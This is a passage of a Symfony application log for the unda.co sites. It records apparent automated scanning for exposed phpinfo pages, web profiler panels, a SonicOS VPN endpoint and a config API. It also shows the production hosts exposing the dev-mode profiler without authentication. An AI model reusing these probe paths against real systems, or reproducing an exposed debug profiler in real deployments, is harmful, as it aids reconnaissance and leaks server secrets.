  6917. [2025-12-20 11:13:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6918. [2025-12-20 11:13:24] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
  6919. [2025-12-20 11:13:24] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6920. [2025-12-20 11:13:24] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6921. [2025-12-20 11:13:24] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6922. [2025-12-20 11:13:24] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6923. [2025-12-20 11:13:24] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6924. [2025-12-20 11:13:24] security.DEBUG: Calling Authentication entry point. [] []
  6925. [2025-12-20 11:13:29] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  6926. [2025-12-20 11:13:29] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6927. [2025-12-20 11:13:29] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6928. [2025-12-20 11:13:29] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6929. [2025-12-20 11:13:29] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6930. [2025-12-20 11:13:29] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6931. [2025-12-20 11:13:29] security.DEBUG: Calling Authentication entry point. [] []
  6932. [2025-12-20 11:13:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6933. [2025-12-20 11:13:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6934. [2025-12-20 11:13:44] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  6935. [2025-12-20 11:13:44] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6936. [2025-12-20 11:13:44] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6937. [2025-12-20 11:13:44] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6938. [2025-12-20 11:13:44] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6939. [2025-12-20 11:13:44] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6940. [2025-12-20 11:13:44] security.DEBUG: Calling Authentication entry point. [] []
  6941. [2025-12-20 11:13:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6942. [2025-12-20 11:13:58] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
  6943. [2025-12-20 11:13:58] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6944. [2025-12-20 11:13:58] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6945. [2025-12-20 11:13:58] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6946. [2025-12-20 11:13:58] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6947. [2025-12-20 11:13:58] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6948. [2025-12-20 11:13:58] security.DEBUG: Calling Authentication entry point. [] []
  6949. [2025-12-20 11:14:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6950. [2025-12-20 11:14:09] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  6951. [2025-12-20 11:14:09] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6952. [2025-12-20 11:14:09] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6953. [2025-12-20 11:14:09] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6954. [2025-12-20 11:14:09] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6955. [2025-12-20 11:14:09] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6956. [2025-12-20 11:14:09] security.DEBUG: Calling Authentication entry point. [] []
  6957. [2025-12-20 11:14:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6958. [2025-12-20 11:14:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2882d9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2882d9?panel=router","method":"GET"} []
  6959. [2025-12-20 11:14:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  6960. [2025-12-20 11:14:36] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  6961. [2025-12-20 11:17:11] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://web.unda.co/_profiler/phpinfo","method":"GET"} []
  6962. [2025-12-20 11:17:11] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
  6963. [2025-12-20 11:17:11] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
  6964. [2025-12-20 11:17:11] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  6965. [2025-12-20 11:17:11] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  6966. [2025-12-20 11:17:11] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  6967. [2025-12-20 11:17:11] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6968. [2025-12-20 11:17:11] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6969. [2025-12-20 11:17:11] security.DEBUG: Calling Authentication entry point. [] []
  6970. [2025-12-20 11:17:14] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F_profiler%2Fphpinfo","method":"GET"} []
  6971. [2025-12-20 11:17:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6972. [2025-12-20 11:17:28] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  6973. [2025-12-20 11:17:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  6974. [2025-12-20 11:17:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  6975. [2025-12-20 11:17:28] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  6976. [2025-12-20 11:17:28] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6977. [2025-12-20 11:17:28] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6978. [2025-12-20 11:17:28] security.DEBUG: Calling Authentication entry point. [] []
  6979. [2025-12-20 11:17:30] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  6980. [2025-12-20 11:17:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6981. [2025-12-20 11:17:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"40ceeb","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/40ceeb?panel=request","method":"GET"} []
  6982. [2025-12-20 11:17:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  6983. [2025-12-20 11:18:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2882d9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2882d9?panel=validator","method":"GET"} []
  6984. [2025-12-20 11:18:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  6985. [2025-12-20 11:20:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"00ba25","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/00ba25?panel=cache","method":"GET"} []
  6986. [2025-12-20 11:20:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  6987. [2025-12-20 11:21:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fc62b3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fc62b3?panel=dump","method":"GET"} []
  6988. [2025-12-20 11:21:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  6989. [2025-12-20 11:22:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=twig","method":"GET"} []
  6990. [2025-12-20 11:22:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  6991. [2025-12-20 11:25:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/sonicos/is-sslvpn-enabled"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/sonicos/is-sslvpn-enabled\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6992. [2025-12-20 11:25:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /__api__/v1/config/domains"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /__api__/v1/config/domains\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6993. [2025-12-20 11:26:16] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://ec2-35-175-10-94.compute-1.amazonaws.com/","method":"GET"} []
  6994. [2025-12-20 11:26:19] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://ec2-35-175-10-94.compute-1.amazonaws.com/_profiler/phpinfo","method":"GET"} []
  6995. [2025-12-20 11:26:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=request","method":"GET"} []
  6996. [2025-12-20 11:26:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  6997. [2025-12-20 11:31:52] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  6998. [2025-12-20 11:31:52] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  6999. [2025-12-20 11:31:52] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7000. [2025-12-20 11:31:52] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7001. [2025-12-20 11:31:52] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  7002. [2025-12-20 11:31:52] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  7003. [2025-12-20 11:31:52] security.DEBUG: Calling Authentication entry point. [] []
  7004. [2025-12-20 11:31:53] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  7005. [2025-12-20 11:31:53] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  7006. [2025-12-20 11:31:53] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7007. [2025-12-20 11:31:53] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7008. [2025-12-20 11:31:53] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  7009. [2025-12-20 11:31:53] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  7010. [2025-12-20 11:31:53] security.DEBUG: Calling Authentication entry point. [] []
  7011. [2025-12-20 11:31:56] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  7012. [2025-12-20 11:32:02] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
  7013. [2025-12-20 11:32:02] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  7014. [2025-12-20 11:32:02] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7015. [2025-12-20 11:32:02] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7016. [2025-12-20 11:32:02] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  7017. [2025-12-20 11:32:02] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  7018. [2025-12-20 11:32:02] security.DEBUG: Calling Authentication entry point. [] []
  7019. [2025-12-20 11:32:07] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F_profiler%2Fphpinfo","method":"GET"} []
  7020. [2025-12-20 11:32:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7021. [2025-12-20 11:32:23] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  7022. [2025-12-20 11:32:23] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  7023. [2025-12-20 11:32:23] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7024. [2025-12-20 11:32:23] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7025. [2025-12-20 11:32:23] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  7026. [2025-12-20 11:32:23] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  7027. [2025-12-20 11:32:23] security.DEBUG: Calling Authentication entry point. [] []
  7028. [2025-12-20 11:32:26] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  7029. [2025-12-20 11:32:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7030. [2025-12-20 11:32:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"00ba25","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/00ba25","method":"GET"} []
  7031. [2025-12-20 11:32:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  7032. [2025-12-20 11:32:43] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
